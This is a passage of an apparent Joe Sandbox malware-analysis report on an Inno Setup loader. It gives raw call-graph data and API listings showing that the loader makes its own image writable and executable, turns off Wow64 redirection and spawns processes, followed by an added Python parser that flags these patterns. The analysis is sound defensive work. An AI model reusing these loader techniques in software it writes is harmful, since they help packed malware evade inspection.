6599->6516 6602 408fa5 6603 408ed0 Wow64RevertWow64FsRedirection 6602->6603 6604 408fad 6603->6604 6604->6516 6606 403278 4 API calls 6605->6606 6607 4032b5 6606->6607 6607->6591 6609 403498 6608->6609 6611 4034c3 6608->6611 6610 4034f0 4 API calls 
6609->6610 6610->6611 6611->6591 6613 40693c 7 API calls 6612->6613 6614 4069b2 GetLastError 6613->6614 6614->6602 6616 406fc7 6615->6616 6634 406fbe 6615->6634 6617 406fd0 6616->6617 6618 407008 6616->6618 6636 406ec8 6617->6636 6619 406ec8 RegOpenKeyExA 6618->6619 6622 407021 6619->6622 6621 406fe9 6623 40703e 6621->6623 6639 406ebc 6621->6639 6622->6623 6625 406ebc 6 API calls 6622->6625 6626 40322c 4 API calls 6623->6626 6629 407035 RegCloseKey 6625->6629 6630 40704b 6626->6630 6627 403198 4 API calls 6631 407080 6627->6631 6629->6623 6632 4032fc 4 API calls 6630->6632 6633 403198 4 API calls 6631->6633 6632->6634 6635 407088 6633->6635 6634->6627 6635->6428 6637 406ed3 6636->6637 6638 406ed9 RegOpenKeyExA 6636->6638 6637->6638 6638->6621 6642 406d70 6639->6642 6643 406d96 RegQueryValueExA 6642->6643 6648 406db9 6643->6648 6657 406ddb 6643->6657 6644 406dd3 6646 403198 4 API calls 6644->6646 6645 403198 4 API calls 6647 406ea7 RegCloseKey 6645->6647 6646->6657 6647->6623 6648->6644 6649 403278 4 API calls 6648->6649 6650 403420 4 API calls 6648->6650 6648->6657 6649->6648 6651 406e10 RegQueryValueExA 6650->6651 6651->6643 6652 406e2c 6651->6652 6653 4034f0 4 API calls 6652->6653 6652->6657 6654 406e6e 6653->6654 6655 406e80 6654->6655 6658 403420 4 API calls 6654->6658 6656 4031e8 4 API calls 6655->6656 6656->6657 6657->6645 6658->6655 6660 4066a4 IsDBCSLeadByte 6659->6660 6662 406795 6660->6662 6661 4067df 6661->6447 6662->6661 6663 4065e0 IsDBCSLeadByte 6662->6663 6663->6662 6665 406853 6664->6665 6666 406780 IsDBCSLeadByte 6665->6666 6669 40685e 6666->6669 6667 40664a 6667->6452 6667->6453 6668 4065e0 IsDBCSLeadByte 6668->6669 6669->6667 6669->6668 6671 4068b7 6670->6671 6672 4068bb 6670->6672 6671->6467 6675 4068d0 CharPrevA 6672->6675 6674 4068cc 6674->6467 6675->6674 5678 407628 WriteFile 5679 407648 5678->5679 5682 40764f 5678->5682 5680 4073ec 21 API calls 5679->5680 5680->5682 5681 407660 5682->5681 5683 40734c 20 API calls 5682->5683 5683->5681 5979 
403a28 ReadFile 5980 403a46 5979->5980 5981 403a49 GetLastError 5979->5981 6680 403932 6681 403924 6680->6681 6682 40374c VariantClear 6681->6682 6683 40392c 6682->6683 6684 408b34 6685 408b3b 6684->6685 6686 403198 4 API calls 6685->6686 6692 408bd5 6686->6692 6687 408c00 6688 4031b8 4 API calls 6687->6688 6690 408c8d 6688->6690 6689 408bec 6693 4032fc 4 API calls 6689->6693 6691 403278 4 API calls 6691->6692 6692->6687 6692->6689 6692->6691 6694 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6692->6694 6693->6687 6694->6692 5988 407ec0 5989 407ee8 5988->5989 5991 407eef 5988->5991 5990 407dfc 21 API calls 5989->5990 5990->5991 5992 407f16 5991->5992 5993 407f18 5991->5993 5997 407f22 5991->5997 5998 4050e4 19 API calls 5992->5998 5994 407d14 19 API calls 5993->5994 5994->5997 5995 407d14 19 API calls 5996 407f57 5995->5996 5999 403198 4 API calls 5996->5999 5997->5995 5997->5996 6000 407f3e 5998->6000 6001 407f6c 5999->6001 6003 407c9c 6000->6003 6004 407c9f 6003->6004 6005 40322c 4 API calls 6004->6005 6006 407cc1 6005->6006 6007 4032fc 4 API calls 6006->6007 6008 407ccb 6007->6008 6009 4057e0 4 API calls 6008->6009 6010 407cda 6009->6010 6011 403198 4 API calls 6010->6011 6012 407cf4 6011->6012 6012->5997 5868 4075cc SetFilePointer 5869 407603 5868->5869 5870 4075f3 GetLastError 5868->5870 5870->5869 5871 4075fc 5870->5871 5872 4073ec 21 API calls 5871->5872 5872->5869 6017 402ccc 6020 402cfe 6017->6020 6021 402cdd 6017->6021 6018 402d88 RtlUnwind 6019 403154 4 API calls 6018->6019 6019->6020 6021->6018 6021->6020 6022 402b28 RaiseException 6021->6022 6023 402d7f 6022->6023 6023->6018 6703 403fcd 6704 403f07 4 API calls 6703->6704 6705 403fd6 6704->6705 6706 403e9c 4 API calls 6705->6706 6707 403fe2 6706->6707 4914 4024d0 4915 4024e4 4914->4915 4916 4024f7 4914->4916 4953 401918 RtlInitializeCriticalSection 4915->4953 4917 402518 4916->4917 4918 40250e RtlEnterCriticalSection 4916->4918 4930 402300 4917->4930 4918->4917 4922 4024ed 4924 402525 4926 
Execution graph (rendered as an image in the interactive report): this span is the raw edge list of the sample's call graph, whose nodes are functions identified by address and annotated with the Win32 APIs they reach. The functions in this part of the graph call RtlEnterCriticalSection / RtlLeaveCriticalSection / RtlDeleteCriticalSection, LocalAlloc, VirtualAlloc / VirtualFree, TlsGetValue / TlsSetValue, CreateFileA / ReadFile / GetFileSize / GetFileType / SetFilePointer / SetEndOfFile / CloseHandle, GetStdHandle, CreateWindowExA / SetWindowLongA / CallWindowProcA, GetCommandLineA, CreateProcessA / GetExitCodeProcess, PeekMessageA / TranslateMessage / DispatchMessageA / MsgWaitForMultipleObjects, Sleep, DeleteFileA / RemoveDirectoryA, Wow64DisableWow64FsRedirection / Wow64RevertWow64FsRedirection, GetLastError / SetLastError, MessageBoxA, IsDBCSLeadByte, CharPrevA, InterlockedExchange and RaiseException. The node and edge identifiers themselves carry no information outside the rendered graph and are omitted here.

                                                                            Control-flow Graph

                                                                            Basic blocks of the function at 409a14 (executed blocks are highlighted in the interactive rendering): block 409a14-409a38 calls GetSystemInfo and VirtualQuery on 00400000, then enters a loop in which block 409aa9-409abb re-issues VirtualQuery for the next region; inside the loop, block 409a68-409a79 calls VirtualProtect, block 409a81-409a8a calls the helper at 409a0c, and block 409a97-409aa4 calls VirtualProtect again before the loop continues; the loop exits to block 409ac8-409acf.
                                                                            APIs
                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409A26
                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                            • String ID:
                                                                            • API String ID: 2441996862-0
                                                                            • Opcode ID: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                            • Instruction ID: 05782b2e5a8588c9c74d05110837466633af9a4b7a19298b20ab433fd050a55e
                                                                            • Opcode Fuzzy Hash: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                            • Instruction Fuzzy Hash: D0216FB13003846BD6309A698C85E67B7DC9F85360F18492AFA85E62C3D73DED40CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                            • Instruction ID: b78bf48cff894a3999656c5243e329942f020ab22272e2e872fdbeeaebf0035e
                                                                            • Opcode Fuzzy Hash: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                            • Instruction Fuzzy Hash: EDE09271B0021426D711A9699C86AEB735DDB58310F0006BFB904EB3C6EDB49E8046ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00408FE8
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00409002
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                            • API String ID: 1646373207-2130885113
                                                                            • Opcode ID: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                            • Instruction ID: 9fcc65c531327f2d7efb14c601a25e4e420c6304718e48176e9e04a6a3b299d5
                                                                            • Opcode Fuzzy Hash: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                            • Instruction Fuzzy Hash: 6701DF70208300AEEB10AB76DC47B563AA8E782714F60843BF504B22C3CA7C5C44CA2E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                            • SetWindowLongA.USER32(00020446,000000FC,004097FC), ref: 0040A027
                                                                              • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                              • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000,0040995B), ref: 004098F8
                                                                              • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000), ref: 0040990C
                                                                              • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                              • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                              • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974), ref: 00409940
                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                            • 73A15CF0.USER32(00020446,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                            • API String ID: 978128352-3001827809
                                                                            • Opcode ID: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                            • Instruction ID: 994b03bd5abc72cbe06dd2c14f0861f5fc0fad0f3ad24bd21fe84be6bde737e4
                                                                            • Opcode Fuzzy Hash: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                            • Instruction Fuzzy Hash: 57411A70A00205DFD715EBA9EE86B9A7BA5EB84304F10427BF510B73E2DB789801DB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02122C20), ref: 00409484
                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                            • SetWindowLongA.USER32(00020446,000000FC,004097FC), ref: 0040A027
                                                                              • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                              • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000,0040995B), ref: 004098F8
                                                                              • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000), ref: 0040990C
                                                                              • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                              • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                              • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974), ref: 00409940
                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                            • 73A15CF0.USER32(00020446,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryErrorExitLastLineLongMultipleObjectsRemoveWait
                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                            • API String ID: 240127915-3001827809
                                                                            • Opcode ID: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                            • Instruction ID: cbbd3698a6e5ddb8e812fa6c760aedb007618753dcf5685e5a94b93d1743052f
                                                                            • Opcode Fuzzy Hash: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                            • Instruction Fuzzy Hash: 04412B70A00205DBC715EBA9EE86B9E3BA5EB84304F10427BF510B73E2DB789801DB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
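Added example (not part of the Joe Sandbox report and not code from the sample): a small Python parser for the "APIs" and "String ID" lines in blocks like the three above, applying the checks a reviewer makes by hand. For the function at 00409A14 it flags a VirtualProtect whose flNewProtect argument is PAGE_EXECUTE_READWRITE (0x40) in a block that starts a VirtualQuery walk at the image base 00400000, the pattern behind "changes PE section rights"; for the block at 00408FE8 it reports Wow64DisableWow64FsRedirection / Wow64RevertWow64FsRedirection being resolved through GetProcAddress; for the block at 0040A010 it recognises the Inno Setup loader stub from the InnoSetupLdrWindow and /SL5=" strings next to CreateWindowExA. The sample blocks are constructed from this report's own entries (slot lists shortened). Two things are my assumptions about the listing format: that the IDA plugin prints more stack slots than the callee takes, so only the first ARITY[api] slots are the call's own arguments, and that "String ID" joins the function's strings with "$".

```python
"""Parse Joe Sandbox 'APIs' / 'String ID' lines and flag behaviours visible in this report."""
import re
from dataclasses import dataclass

# Protection constants from winnt.h: flNewProtect values that leave a page writable and executable.
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
WRITABLE_EXECUTABLE = {PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# Documented parameter counts. ASSUMPTION about the listing format: the IDA plugin prints every
# stack slot it recovered at the call site, more than the callee takes, so only the first
# ARITY[api] slots are that call's own arguments; later slots belong to the caller's frame.
ARITY = {"VirtualProtect": 4, "VirtualQuery": 3, "GetProcAddress": 2, "GetModuleHandleA": 1}

WOW64_NAMES = {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection"}
INNO_MARKERS = {"InnoSetupLdrWindow", '/SL5="'}   # strings of the Inno Setup loader stub

# "VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00409A72"   (leading bullet optional)
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# 'String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC'   (ASSUMPTION: '$' separates strings)
STRING_ID = re.compile(r"^\s*•?\s*String ID:\s*(?P<strings>.*?)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # raw slot tokens; "?" where the plugin could not recover a value
    ref: int     # address of the call instruction


def parse_api_line(line):
    m = API_LINE.match(line)
    if m is None:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def parse_strings(lines):
    """All strings from the block's 'String ID' line(s)."""
    out = []
    for line in lines:
        m = STRING_ID.match(line)
        if m is not None:
            out.extend(s for s in m.group("strings").split("$") if s)
    return out


def parse_block(lines):
    """One report block (the lines under a single 'APIs' heading) -> list of ApiCall."""
    return [c for c in map(parse_api_line, lines) if c is not None]


def own_args(call):
    return call.args[: ARITY.get(call.api, len(call.args))]


def as_int(token):
    try:
        return int(token, 16)
    except ValueError:
        return None


def find_rwx_virtualprotect(calls):
    """Call sites where VirtualProtect's own flNewProtect slot is a writable+executable value."""
    return [c.ref for c in calls
            if c.api == "VirtualProtect" and len(own_args(c)) > 2
            and as_int(own_args(c)[2]) in WRITABLE_EXECUTABLE]


def queries_image_base(calls, image_base):
    """True if the block starts a VirtualQuery walk at the module's own image base."""
    return any(c.api == "VirtualQuery" and own_args(c) and as_int(own_args(c)[0]) == image_base
               for c in calls)


def find_runtime_resolved(calls, names):
    """Names resolved through GetProcAddress in this block. The name is pushed before the
    GetProcAddress call, so the plugin shows it among the slots of the preceding
    GetModuleHandleA line, not on the GetProcAddress line; hence every slot is searched."""
    if not any(c.api == "GetProcAddress" for c in calls):
        return set()
    seen = {tok for c in calls for tok in c.args}
    return {n for n in names if n in seen}


def assess(block, image_base=0x400000):
    calls = parse_block(block)
    strings = set(parse_strings(block))
    return {
        "rwx_virtualprotect": find_rwx_virtualprotect(calls),
        "walks_own_image": queries_image_base(calls, image_base),
        "runtime_resolved": sorted(find_runtime_resolved(calls, WOW64_NAMES)),
        "inno_setup_loader": bool(INNO_MARKERS & strings)
                             and any(c.api == "CreateWindowExA" for c in calls),
    }


# Constructed sample blocks, copied in shape from this report's entries (not a live trace).
UNPACK_BLOCK = [
    "• GetSystemInfo.KERNEL32(?), ref: 00409A26",
    "• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31",
    "• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72",
    "• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4",
    "• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4",
]
WOW64_BLOCK = [
    "• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00408FE8",
    "• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE",
    "• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000), ref: 00409002",
    "• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008",
]
LOADER_BLOCK = [
    "• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00400000,00000000), ref: 0040A010",
    "• SetWindowLongA.USER32(00020446,000000FC,004097FC), ref: 0040A027",
    "• RemoveDirectoryA.KERNEL32(00000000,0040A166,?), ref: 0040A113",
    '• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC',
]
```

Running assess(UNPACK_BLOCK) reports only the call at 00409A72: the second VirtualProtect at 00409AA4 has "?" in its own third slot, and the 00000040 that appears later in its list is a leftover slot from the earlier frame, which is consistent with the second call restoring the previous protection after the region was made writable and executable. These checks describe the Inno Setup loader stub that wraps the payload, not what it unpacks; a clean Inno Setup installer produces the same VirtualProtect and Wow64 entries, so the verdict on the sample has to rest on the other signatures in the report.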

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000,0040995B), ref: 004098F8
                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000), ref: 0040990C
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                            • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974), ref: 00409940
                                                                              • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02122C20), ref: 00409484
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                            • String ID: D
                                                                            • API String ID: 3356880605-2746444292
                                                                            • Opcode ID: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
                                                                            • Instruction ID: 0c6d97fba1df7b16fba7b9ed0c132cba9133a3324ac8f072eb64155fee6ae1b7
                                                                            • Opcode Fuzzy Hash: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
                                                                            • Instruction Fuzzy Hash: AC1130B16142086EDB10FBE68C52F9EBBACEF49718F50013EB614F62C7DA785D048669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: $u@$.tmp
                                                                            • API String ID: 2030045667-236237750
                                                                            • Opcode ID: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
                                                                            • Instruction ID: fbeaf51a7290a35b1d20cf1acd7fffd14229a7cea4ec7fe779b7d8bf1d8f9ef0
                                                                            • Opcode Fuzzy Hash: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
                                                                            • Instruction Fuzzy Hash: 7041A170604201DFD311EF19DE92A5A7BA6FB49304B11453AF801B73E2CB79AC01DAAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: $u@$.tmp
                                                                            • API String ID: 2030045667-236237750
                                                                            • Opcode ID: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
                                                                            • Instruction ID: 7aabf0afbc79ebbbc3d3aa4d6af75c8ddef5afe13af9357e4f9bebdf666c2db7
                                                                            • Opcode Fuzzy Hash: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
                                                                            • Instruction Fuzzy Hash: 66418070600201DFC711EF69DE92A5A7BB6FB49304B11457AF801B73E2CB79AC01DAAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040929A
                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004092A3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: .tmp
                                                                            • API String ID: 1375471231-2986845003
                                                                            • Opcode ID: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
                                                                            • Instruction ID: 381de743b5e558d6c5ac88c9815bc56a2e764fefa580558ac3af8d983805238d
                                                                            • Opcode Fuzzy Hash: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
